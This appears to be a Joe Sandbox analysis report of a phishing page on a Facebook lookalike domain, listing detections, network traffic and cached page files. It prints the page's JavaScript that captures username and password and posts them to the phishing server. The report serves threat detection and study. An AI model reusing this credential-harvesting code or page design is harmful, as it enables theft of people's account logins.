Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in

Overview

General Information

Sample URL:https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
Analysis ID:1448163
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAvira URL Cloud: detection malicious, Label: phishing
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Antivirus detection for URL or domain
Source: https://vww-facebook.com.vn/theme/fbweb1/fbstyle.cssAvira URL Cloud: Label: phishing
Source: https://vww-facebook.com.vn/theme/fbweb1/logo.svgAvira URL Cloud: Label: phishing
Source: https://vww-facebook.com.vn/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Phishing site detected (based on logo match)
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inMatcher: Template: facebook matched
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: Number of links: 0
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: Title: Full video call video cng ngi yu b l mi nht.Video24h.com does not match URL
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: <input type="password" .../> found
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: No favicon
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: No <meta name="author".. found
Source: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /theme/fbweb1/fbstyle.css HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /theme/fbweb1/logo.svg HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /theme/fbweb1/logo.svg HTTP/1.1Host: vww-facebook.com.vnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vww-facebook.com.vnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_inAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vww-facebook.com.vnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficDNS traffic detected: DNS query: vww-facebook.com.vn
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@16/9@6/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection		1
Process Injection		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in100%Avira URL Cloudphishing
https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in100%SlashNextCredential Stealing type: Phishing & Social Engineering

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://vww-facebook.com.vn/theme/fbweb1/fbstyle.css100%Avira URL Cloudphishing
https://vww-facebook.com.vn/theme/fbweb1/logo.svg100%Avira URL Cloudphishing
https://vww-facebook.com.vn/favicon.ico100%Avira URL Cloudphishing

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
vww-facebook.com.vn
188.114.96.3
truefalse
    		unknown
    www.google.com
    		142.250.185.196
    		truefalse
      		unknown
      fp2e7a.wpc.phicdn.net
      		192.229.221.95
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://vww-facebook.com.vn/theme/fbweb1/fbstyle.cssfalse
        • Avira URL Cloud: phishing
        		unknown
        https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_intrue
          		unknown
          https://vww-facebook.com.vn/favicon.icofalse
          • Avira URL Cloud: phishing
          		unknown
          https://vww-facebook.com.vn/theme/fbweb1/logo.svgfalse
          • Avira URL Cloud: phishing
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          239.255.255.250
          		unknownReserved
          		unknownunknownfalse
          188.114.97.3
          		unknownEuropean Union
          		13335CLOUDFLARENETUSfalse
          142.250.185.196
          		www.google.comUnited States
          		15169GOOGLEUSfalse
          188.114.96.3
          		vww-facebook.com.vnEuropean Union
          		13335CLOUDFLARENETUSfalse

          Private

          IP
          192.168.2.4
          192.168.2.6

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1448163
          Start date and time:2024-05-28 00:32:23 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 6s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:browseurl.jbs
          Sample URL:https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal60.phis.win@16/9@6/6
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.110.84, 142.250.184.195, 34.104.35.123, 142.250.185.170, 142.250.186.106, 172.217.23.106, 142.250.186.74, 142.250.184.202, 142.250.181.234, 172.217.16.202, 172.217.18.106, 142.250.184.234, 142.250.185.202, 142.250.186.42, 142.250.186.170, 142.250.186.138, 142.250.185.234, 172.217.18.10, 172.217.16.138, 216.58.206.74, 40.68.123.157, 93.184.221.240, 192.229.221.95, 20.242.39.171, 13.95.31.18, 142.250.186.163
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in

          Simulations

          Behavior and APIs

          No simulations

          LLM Input / Output

          InputOutput
          URL: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in Model: gpt-4o
          ```json
{
  "riskscore": 7,
  "reasons": "The JavaScript code captures user credentials (username and password) and sends them via an AJAX POST request to a server-side script (/system/login.php). This behavior is typical of a login form, but without additional context or verification of the server-side script's legitimacy, it could potentially be used for phishing. The hardcoded 'id' parameter and redirection to a success page also raise concerns about the potential misuse of user credentials."
}
          function Login() {

  $('#ok').html('ang ng nhp...');
    $('#ok').attr('disabled', 'disabled');
            $.ajax({
            url: "/system/login.php",
            method: "POST",
            data: {
               id: '55345',
               tk: $("#tk").val(),
               mk: $("#mk").val(),
               type: 'Facebook'
          
    },
            success: function(response) {
                
               var data = JSON.parse(response);
               var message = data.message;
               var status = data.status;
              
              
               if (status == 'error') { 
                 $('#ok').removeAttr('disabled');
                 $('#ok').html('ng nhp');
                 $(".notilog").remove()
                document.getElementById('tk').style = 'border: 1px solid #FA3E3E;';
                document.getElementById('error').style = 'background-color: #FA3E3E; padding: 3px; color: #FFFFF3; text-align: center; font-size:15px; font-family: Arial, Helvetica, sans-serif;'
                document.getElementById('error').innerHTML = message;
               } else {
                   
                $("#error").remove()
                  window.location.href = "/success.php?id=55345"; 
                  
               }

            },
            error: function(e) {
               console.log(e);
            }
         });
      }

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          Chrome Cache Entry: 45

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65447)
          Category:downloaded
          Size (bytes):89795
          Entropy (8bit):5.290870198529059
          Encrypted:false
          SSDEEP:1536:IjjxXUHunxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBqUsuy8WnKdXwhLQvg:IeeIygP3fulzhsz8jlvaDioQ47GKH
          MD5:641DD14370106E992D352166F5A07E99
          SHA1:EDA46747C71D38A880BEE44F9A439C3858BB8F99
          SHA-256:A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
          SHA-512:A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
          Malicious:false
          Reputation:low
          URL:https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
          Preview:/*! jQuery v3.6.4 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

          Chrome Cache Entry: 46

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:downloaded
          Size (bytes):2918
          Entropy (8bit):4.655065340213016
          Encrypted:false
          SSDEEP:48:tMRAoJej1Arn9B7DtetoI4IAe2iFFoixzo74sQ8iDOq9eYd6srJeDvFKTXBvn7gx:sJU+v7ReeI4InRFFRxkiDV9ea6srJcvD
          MD5:55D1B2ACDBC70709CDF74480CD5F8F7A
          SHA1:E57D201E56049FDA78B7481322A2CE9B58480C99
          SHA-256:0DCFBE7C04021FDFCA0E181C4BC1D53FDEED2A05A99F630FEC43FAD5766F9AF2
          SHA-512:9A973C9FAAA40A06D3431FC5F931868C4CFD8364E234F520C93E337C2D75092BD0775B847B6B8CE5049D40718661D5D77DCE80AB6DBEBB77A42B7D26FA6573BE
          Malicious:false
          Reputation:low
          URL:https://vww-facebook.com.vn/theme/fbweb1/fbstyle.css
          Preview:...alert {. background-color: #f3071a;. color: #f3ebeb;. padding: 0;. margin: 0;. text-align: left;. position: fixed;. top: 0;. left: 0;. width: 100%;. line-height: 1.5;.}...alert span {. display: inline-block;. padding: 5px 10px;. background-color: #ff0015;.}...alert strong {. font-weight: bold;.}...overlay {. position: fixed;. top: 0;. left: 0;. width: 100%;. height: 100%;. background-color: #ffffff;. display: flex;. justify-content: center;. align-items: center;. z-index: 9999;.}...overlay-content {. display: flex;. flex-direction: column;. align-items: center;.}...logo {. text-align: center;. margin-bottom: 5px;.}...logo img {. width: 145px;.}....overlay-icon {. font-size: 40px;. margin-bottom: 20px;.}...overlay-text {. font-size: 20px;. font-weight: bold;. text-align: center;.}...container {. max-width: 400px;. margin: auto;. text-align: center;. padding: 6px;.}

          Chrome Cache Entry: 47

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:downloaded
          Size (bytes):2385
          Entropy (8bit):4.556036774993824
          Encrypted:false
          SSDEEP:48:07t6n8MnrFQiEC2o9M64cdImBl5cDiLgq4:6uraboGGI62iMB
          MD5:EBD8798BC32C86494851A07770E04E63
          SHA1:B5461DC8F5F5F848033441D506EE05D48742438B
          SHA-256:9531E96099E973B3D1C291F3E60419D8FE4730F46DE8A492FCCD2B4C962C96CE
          SHA-512:FB376AADA13675B405EBBF55C332665B5A89B7A905323D227EDFEE7729246E37A1B6B338554FFF4A0E2BB38DFBEAED59BE278BBF6F6BDFDFB4300AA6E54743E7
          Malicious:false
          Reputation:low
          URL:https://vww-facebook.com.vn/theme/fbweb1/logo.svg
          Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z"/><path class="cls-1" d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.

          Chrome Cache Entry: 48

          Download File
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):28
          Entropy (8bit):4.2359263506290326
          Encrypted:false
          SSDEEP:3:aoCHPUiYn:ovUL
          MD5:E0D39FE1505D2EF86332E1CF5710ACF9
          SHA1:998F55358D49542285D7745DA5BC742F4580675B
          SHA-256:9AC6F68FD65AE805BCA98F6B933C095A1E24B094B7423EF2BECFF8CEEDE0D3DA
          SHA-512:92B684CC776261575E87F5D4C8EEFFC395712EFA6916D181774EB359EBC5E1D12D3B3A8296CA3BFFCFF92E73E7900C46307EC369A5C6ECD99CFA2EDF7F733CC4
          Malicious:false
          Reputation:low
          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkIXSiJnyHX9RIFDdtsURoSBQ2-jj1P?alt=proto
